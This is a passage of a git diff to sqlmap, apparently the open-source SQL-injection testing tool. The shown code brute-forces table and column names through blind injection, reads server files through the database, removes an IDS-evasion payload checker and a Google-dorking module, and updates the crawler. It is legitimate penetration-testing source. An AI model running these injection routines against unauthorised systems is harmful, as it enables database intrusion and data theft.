lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) + tables.extend(_addPageTextWords()) + tables = filterListValue(tables, regex) + + for conf.db in (conf.db.split(',') if conf.db else [conf.db]): + if conf.db and METADB_SUFFIX not in conf.db: + infoMsg = "checking database '%s'" % conf.db + logger.info(infoMsg) + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(tables) + threadData.shared.files = [] + threadData.shared.unique = set() + + def tableExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + fullTableName = "%s.%s" % (conf.db, table) + else: + fullTableName = table + + if Backend.isDbms(DBMS.MCKOI): + _ = randomInt(1) + result = inject.checkBooleanExpression("%s" % safeStringFormat("%d=(SELECT %d FROM %s)", (_, _, fullTableName))) + else: + result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) + + kb.locks.io.acquire() + + if result and table.lower() not 
in threadData.shared.unique: + threadData.shared.files.append(table) + threadData.shared.unique.add(table.lower()) + + if conf.verbose in (1, 2) and not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, tableExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during table existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no table(s) found" + if conf.db: + warnMsg += " for database '%s'" % conf.db + logger.warning(warnMsg) + else: + for item in threadData.shared.files: + if conf.db not in kb.data.cachedTables: + kb.data.cachedTables[conf.db] = [item] + else: + kb.data.cachedTables[conf.db].append(item) + + for _ in ((conf.db, item) for item in threadData.shared.files): + if _ not in kb.brute.tables: + kb.brute.tables.append(_) + + conf.db = popValue() + hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) + + return kb.data.cachedTables + +def columnExists(columnFile, regex=None): + if kb.choices.columnExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: + warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) + warnMsg += "for common column existence check" + logger.warning(warnMsg) + + message = "are you sure you want to continue? 
[y/N] " + kb.choices.columnExists = readInput(message, default='N', boolean=True) + + if not kb.choices.columnExists: + return None + + if not conf.tbl: + errMsg = "missing table parameter" + raise SqlmapMissingMandatoryOptionException(errMsg) + + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + conf.db = conf.db.upper() + + result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) + + if result: + errMsg = "can't use column existence check because of detected invalid results " + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" + raise SqlmapDataException(errMsg) + + message = "which common columns (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % columnFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common columns file location?\n" + columnFile = readInput(message) or columnFile + + infoMsg = "checking column existence using items from '%s'" % columnFile + logger.info(infoMsg) + + columns = getFileItems(columnFile, unique=True) + columns.extend(_addPageTextWords()) + columns = filterListValue(columns, regex) + + for table in conf.tbl.split(','): + table = safeSQLIdentificatorNaming(table, True) + + if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) + + kb.threadContinue = True + kb.bruteMode = True + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(columns) + threadData.shared.files = [] + + def columnExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + + if threadData.shared.count < threadData.shared.limit: + column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + if Backend.isDbms(DBMS.MCKOI): + result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table))) + else: + result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) + + kb.locks.io.acquire() + + if result: + threadData.shared.files.append(column) + + if conf.verbose in (1, 2) and not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, columnExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during column existence " + warnMsg += "check. 
sqlmap will display partial output" + logger.warning(warnMsg) + finally: + kb.bruteMode = False + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no column(s) found" + logger.warning(warnMsg) + else: + columns = {} + + for column in threadData.shared.files: + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,): + result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column))) + elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,): + result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table))) + else: + result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) + + if result: + columns[column] = "numeric" + else: + columns[column] = "non-numeric" + + kb.data.cachedColumns[conf.db] = {table: columns} + + for _ in ((conf.db, table, item[0], item[1]) for item in columns.items()): + if _ not in kb.brute.columns: + kb.brute.columns.append(_) + + hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) + + return kb.data.cachedColumns + +@stackedmethod +def fileExists(pathFile): + retVal = [] + + message = "which common files file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % pathFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common files file location?\n" + pathFile = readInput(message) or pathFile + + infoMsg = "checking files existence using items from '%s'" % pathFile + logger.info(infoMsg) + + paths = getFileItems(pathFile, unique=True) + + kb.bruteMode = True + + try: + conf.dbmsHandler.readFile(randomStr()) + except SqlmapNoneDataException: + pass + except: + kb.bruteMode = False + raise + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(paths) + threadData.shared.files = [] + + def fileExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + path = ntToPosixSlashes(paths[threadData.shared.count]) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + try: + result = unArrayizeValue(conf.dbmsHandler.readFile(path)) + except SqlmapNoneDataException: + result = None + + kb.locks.io.acquire() + + if not isNoneValue(result): + threadData.shared.files.append(result) + + if not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: '%s'\n" % (time.strftime("%X"), path) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, fileExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during file existence " + warnMsg += "check. 
sqlmap will display partial output" + logger.warning(warnMsg) + finally: + kb.bruteMode = False + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no file(s) found" + logger.warning(warnMsg) + else: + retVal = threadData.shared.files + + return retVal diff --git a/lib/utils/checkpayload.py b/lib/utils/checkpayload.py deleted file mode 100644 index 84410f8a542..00000000000 --- a/lib/utils/checkpayload.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import readXmlFile -from lib.core.common import urldecode -from lib.core.data import paths -from lib.core.data import logger - -rules = None - -def _adjustGrammar(string): - string = re.sub('\ADetects', 'Detected', string) - string = re.sub('\Afinds', 'Found', string) - string = re.sub('attempts\Z', 'attempt', string) - string = re.sub('injections\Z', 'injection', string) - string = re.sub('attacks\Z', 'attack', string) - - return string - -def checkPayload(payload): - """ - This method checks if the generated payload is detectable by the - PHPIDS filter rules - """ - - if not payload: - return - - global rules - - detected = False - payload = urldecode(payload, convall=True) - - if not rules: - xmlrules = readXmlFile(paths.PHPIDS_RULES_XML) - rules = [] - - for xmlrule in xmlrules.getElementsByTagName("filter"): - rule = "(?i)%s" % xmlrule.getElementsByTagName('rule')[0].childNodes[0].nodeValue - desc = _adjustGrammar(xmlrule.getElementsByTagName('description')[0].childNodes[0].nodeValue) - rules.append((rule, desc)) - - if payload: - for rule, desc in rules: - if re.search(rule, payload): - detected = True - logger.warn("highly probable IDS/IPS detection: '%s: %s'" % (desc, payload)) - - if not detected: - logger.warn("payload '%s' possibly gone undetected" % payload) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 36d92362656..3741d2ace14 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -1,34 +1,55 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import httplib +from __future__ import division + +import os import re -import urlparse +import tempfile import time +from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult from lib.core.common import findPageForms -from lib.core.common import singleTimeWarnMessage +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import readInput +from lib.core.common import safeCSValue +from lib.core.common import urldecode +from lib.core.compat import xrange +from lib.core.convert import htmlUnescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads +from lib.parse.sitemap import parseSitemap from 
lib.request.connect import Connect as Request +from thirdparty import six from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup -from thirdparty.oset.pyoset import oset +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + +def crawl(target, post=None, cookie=None): + if not target: + return -def crawl(target): try: + visited = set() threadData = getCurrentThreadData() - threadData.shared.value = oset() + threadData.shared.value = OrderedSet() + threadData.shared.formsFound = False def crawlThread(): threadData = getCurrentThreadData() @@ -37,26 +58,37 @@ def crawlThread(): with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() + if current in visited: + continue + elif conf.crawlExclude and re.search(conf.crawlExclude, current): + dbgMsg = "skipping '%s'" % current + logger.debug(dbgMsg) + continue + else: + visited.add(current) else: break content = None try: if current: - content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, e: - errMsg = "connection exception detected (%s). skipping " % e - errMsg += "url '%s'" % current + content = Request.getPage(url=current, post=post, cookie=None, crawling=True, raise404=False)[0] + except SqlmapConnectionException as ex: + errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex) + errMsg += "URL '%s'" % current logger.critical(errMsg) - except httplib.InvalidURL, e: - errMsg = "invalid url detected (%s). skipping " % e - errMsg += "url '%s'" % current + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except _http_client.InvalidURL as ex: + errMsg = "invalid URL detected ('%s'). 
skipping " % getSafeExString(ex) + errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break - if isinstance(content, unicode): + if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: @@ -65,17 +97,19 @@ def crawlThread(): soup = BeautifulSoup(content) tags = soup('a') - if not tags: - tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content) + tags += re.finditer(r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content) + tags += re.finditer(r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: - url = urlparse.urljoin(target, href) + if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: + current = threadData.lastRedirectURL[1] + url = _urllib.parse.urljoin(current, htmlUnescape(href)) # flag to know if we are dealing with the same target host - _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) + _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): @@ -83,16 +117,20 @@ def crawlThread(): elif not _: continue - if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: + if (extractRegexResult(r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "").lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) - if re.search(r"(.*?)\?(.+)", url): + if re.search(r"(.*?)\?(.+)", url) and not re.search(r"\?(v=)?\d+\Z", url) and not re.search(r"(?i)\.(js|css)(\?|\Z)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass + except ValueError: # for non-valid links + pass + except AssertionError: # for invalid HTML + pass finally: if conf.forms: - findPageForms(content, current, False, True) + threadData.shared.formsFound |= len(findPageForms(content, current, False, True)) > 0 if conf.verbose in (1, 2): threadData.shared.count += 1 @@ -102,17 +140,56 @@ def crawlThread(): threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) - logger.info("starting crawler") + _ = re.sub(r"(?<!/)/(?!/).*", "", target) + if _: + if target.strip('/') != _.strip('/'): + threadData.shared.unprocessed.add(_) + + if re.search(r"\?.*\b\w+=", target): + threadData.shared.value.add(target) + + if kb.checkSitemap is None: + message = "do you want to check for the existence of " + message += "site's sitemap(.xml) [y/N] " + kb.checkSitemap = readInput(message, default='N', boolean=True) + + if kb.checkSitemap: + found = True + items = None + url = _urllib.parse.urljoin(target, "/sitemap.xml") + try: + items = parseSitemap(url) + except SqlmapConnectionException as ex: + if "page not found" in getSafeExString(ex): + found = False + logger.warning("'sitemap.xml' not found") + except: + pass + finally: + if found: + if items: + for item in items: + if re.search(r"(.*?)\?(.+)", item): + threadData.shared.value.add(item) + if conf.crawlDepth > 1: + threadData.shared.unprocessed.update(items) + logger.info("%s links found" % ("no" if not items else len(items))) + + if not conf.bulkFile: + infoMsg = "starting crawler for target URL '%s'" % target + logger.info(infoMsg) for i in xrange(conf.crawlDepth): - if i > 0 and conf.threads == 1: - singleTimeWarnMessage("running in a single-thread mode. 
This could take a while.") threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) - logger.info("searching for links with depth %d" % (i + 1)) - runThreads(numThreads, crawlThread) + + if not conf.bulkFile: + logger.info("searching for links with depth %d" % (i + 1)) + + runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) + if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: @@ -121,14 +198,68 @@ def crawlThread(): except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" - logger.warn(warnMsg) + logger.warning(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) + if not (conf.forms and threadData.shared.formsFound): + warnMsg = "no usable links found (with GET parameters)" + if conf.forms: + warnMsg += " or forms" + logger.warning(warnMsg) else: for url in threadData.shared.value: - kb.targets.add((url, None, None, None)) + kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) + + if kb.targets: + if kb.normalizeCrawlingChoice is None: + message = "do you want to normalize " + message += "crawling results [Y/n] " + + kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True) + + if kb.normalizeCrawlingChoice: + seen = set() + results = OrderedSet() + + for target in kb.targets: + value = "%s%s%s" % (target[0], '&' if '?' in target[0] else '?', target[2] or "") + match = re.search(r"/[^/?]*\?.+\Z", value) + if match: + key = re.sub(r"=[^=&]*", "=", match.group(0)).strip("&?") + if '=' in key and key not in seen: + results.add(target) + seen.add(key) + + kb.targets = results + + storeResultsToFile(kb.targets) + +def storeResultsToFile(results): + if not results: + return + + if kb.storeCrawlingChoice is None: + message = "do you want to store crawling results to a temporary file " + message += "for eventual further processing with other tools [y/N] " + + kb.storeCrawlingChoice = readInput(message, default='N', boolean=True) + + if kb.storeCrawlingChoice: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt") + os.close(handle) + + infoMsg = "writing crawling results to a temporary file '%s' " % filename + logger.info(infoMsg) + + with openFile(filename, "w+") as f: + if conf.forms: + f.write("URL,POST\n") + + for url, _, data, _, _ in results: + if conf.forms: + f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or ""))) + else: + f.write("%s\n" % url) diff --git a/lib/utils/deps.py b/lib/utils/deps.py index 911b0eb41b2..51a9a23ea46 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger @@ -19,33 +19,52 @@ def checkDependencies(): try: if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql - import pymssql + __import__("_mssql") + pymssql = __import__("pymssql") if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. 
" - warnMsg += "Download from %s" % data[2] - logger.warn(warnMsg) + warnMsg += "Download from '%s'" % data[2] + logger.warning(warnMsg) elif dbmsName == DBMS.MYSQL: - import pymysql - elif dbmsName == DBMS.PGSQL: - import psycopg2 + __import__("pymysql") + elif dbmsName in (DBMS.PGSQL, DBMS.CRATEDB): + __import__("psycopg2") elif dbmsName == DBMS.ORACLE: - import cx_Oracle + __import__("oracledb") elif dbmsName == DBMS.SQLITE: - import sqlite3 + __import__("sqlite3") elif dbmsName == DBMS.ACCESS: - import pyodbc + __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb + __import__("kinterbasdb") elif dbmsName == DBMS.DB2: - import ibm_db_dbi - except ImportError: + __import__("ibm_db_dbi") + elif dbmsName in (DBMS.HSQLDB, DBMS.CACHE): + __import__("jaydebeapi") + __import__("jpype") + elif dbmsName == DBMS.INFORMIX: + __import__("ibm_db_dbi") + elif dbmsName == DBMS.MONETDB: + __import__("pymonetdb") + elif dbmsName == DBMS.DERBY: + __import__("drda") + elif dbmsName == DBMS.VERTICA: + __import__("vertica_python") + elif dbmsName == DBMS.PRESTO: + __import__("prestodb") + elif dbmsName == DBMS.MIMERSQL: + __import__("mimerpy") + elif dbmsName == DBMS.CUBRID: + __import__("CUBRIDdb") + elif dbmsName == DBMS.CLICKHOUSE: + __import__("clickhouse_connect") + except: warnMsg = "sqlmap requires '%s' third-party library " % data[1] - warnMsg += "in order to directly connect to the database " - warnMsg += "%s. Download from %s" % (dbmsName, data[2]) - logger.warn(warnMsg) + warnMsg += "in order to directly connect to the DBMS " + warnMsg += "'%s'. Download from '%s'" % (dbmsName, data[2]) + logger.warning(warnMsg) missing_libraries.add(data[1]) continue @@ -54,30 +73,71 @@ def checkDependencies(): logger.debug(debugMsg) try: - import impacket + __import__("impacket") debugMsg = "'python-impacket' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "http://code.google.com/p/impacket/" - logger.warn(warnMsg) + warnMsg += "'https://github.com/coresecurity/impacket'" + logger.warning(warnMsg) missing_libraries.add('python-impacket') try: - import ntlm + __import__("ntlm") debugMsg = "'python-ntlm' third-party library is found" logger.debug(debugMsg) except ImportError: - warnMsg = "sqlmap requires 'python-ntlm' third-party library for " + warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" - logger.warn(warnMsg) + warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'" + logger.warning(warnMsg) missing_libraries.add('python-ntlm') + try: + __import__("httpx") + debugMsg = "'httpx[http2]' third-party library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'httpx[http2]' third-party library " + warnMsg += "if you plan to use HTTP version 2" + logger.warning(warnMsg) + missing_libraries.add('httpx[http2]') + + try: + __import__("websocket._abnf") + debugMsg = "'websocket-client' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'websocket-client' third-party library " + warnMsg += "if you plan to attack a web application using WebSocket. 
" + warnMsg += "Download from 'https://pypi.python.org/pypi/websocket-client/'" + logger.warning(warnMsg) + missing_libraries.add('websocket-client') + + try: + __import__("tkinter") + debugMsg = "'tkinter' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'tkinter' library " + warnMsg += "if you plan to run a GUI" + logger.warning(warnMsg) + missing_libraries.add('tkinter') + + try: + __import__("tkinter.ttk") + debugMsg = "'tkinter.ttk' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'tkinter.ttk' library " + warnMsg += "if you plan to run a GUI" + logger.warning(warnMsg) + missing_libraries.add('tkinter.ttk') + if IS_WIN: try: - import pyreadline + __import__("pyreadline") debugMsg = "'python-pyreadline' third-party library is found" logger.debug(debugMsg) except ImportError: @@ -85,11 +145,10 @@ def checkDependencies(): warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " - warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" - logger.warn(warnMsg) + warnMsg += "'https://pypi.org/project/pyreadline/'" + logger.warning(warnMsg) missing_libraries.add('python-pyreadline') if len(missing_libraries) == 0: infoMsg = "all dependencies are installed" logger.info(infoMsg) - diff --git a/lib/utils/getch.py b/lib/utils/getch.py index 65a54e14741..00c92f87368 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ class _Getch(object): @@ -16,16 +16,15 @@ def __init__(self): except ImportError: try: self.impl = _GetchMacCarbon() - except(AttributeError, ImportError): + except (AttributeError, ImportError): self.impl = _GetchUnix() def __call__(self): return self.impl() - class _GetchUnix(object): def __init__(self): - import tty + __import__("tty") def __call__(self): import sys @@ -41,16 +40,14 @@ def __call__(self): termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch - class _GetchWindows(object): def __init__(self): - import msvcrt + __import__("msvcrt") def __call__(self): import msvcrt return msvcrt.getch() - class _GetchMacCarbon(object): """ A function which returns the current ASCII key that is down; @@ -60,10 +57,12 @@ class _GetchMacCarbon(object): """ def __init__(self): import Carbon - Carbon.Evt # see if it has this (in Unix, it doesn't) + + getattr(Carbon, "Evt") # see if it has this (in Unix, it doesn't) def __call__(self): import Carbon + if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask return '' else: @@ -79,6 +78,4 @@ def __call__(self): (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] return chr(msg & 0x000000FF) - getch = _Getch() - diff --git a/lib/utils/google.py b/lib/utils/google.py deleted file mode 100644 index 7b74b296efd..00000000000 --- a/lib/utils/google.py +++ /dev/null @@ -1,106 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import httplib -import re -import socket -import urllib -import urllib2 - -from lib.core.common import getUnicode -from lib.core.common import urlencode -from lib.core.data import conf 
-from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.settings import GOOGLE_REGEX -from lib.core.settings import UNICODE_ENCODING -from lib.request.basic import decodePage - -class Google(object): - """ - This class defines methods used to perform Google dorking (command - line option '-g <google dork>' - """ - - def __init__(self, handlers): - self._cj = cookielib.CookieJar() - - handlers.append(urllib2.HTTPCookieProcessor(self._cj)) - - self.opener = urllib2.build_opener(*handlers) - self.opener.addheaders = conf.httpHeaders - - try: - conn = self.opener.open("http://www.google.com/ncr") - conn.info() # retrieve session cookie - except urllib2.HTTPError, e: - e.info() - except urllib2.URLError: - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - def search(self, dork): - """ - This method performs the effective search on Google providing - the google dork and the Google session cookie - """ - - gpage = conf.googlePage if conf.googlePage > 1 else 1 - logger.info("using Google result page #%d" % gpage) - - if not dork: - return None - - url = "http://www.google.com/search?" - url += "q=%s&" % urlencode(dork, convall=True) - url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" - url += "&start=%d" % ((gpage - 1) * 100) - - try: - conn = self.opener.open(url) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except (urllib2.URLError, socket.error, socket.timeout): - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)] - - if not retVal and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "this computer disabling further searches" - raise SqlmapGenericException(warnMsg) - - return retVal diff --git a/lib/utils/gui.py b/lib/utils/gui.py new file mode 100644 index 00000000000..3e3500bc507 --- /dev/null +++ b/lib/utils/gui.py @@ -0,0 +1,426 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re +import socket +import subprocess +import sys +import tempfile +import threading +import webbrowser + +from lib.core.common import getSafeExString +from lib.core.common import saveConfig +from lib.core.data import paths +from lib.core.defaults import defaults +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import 
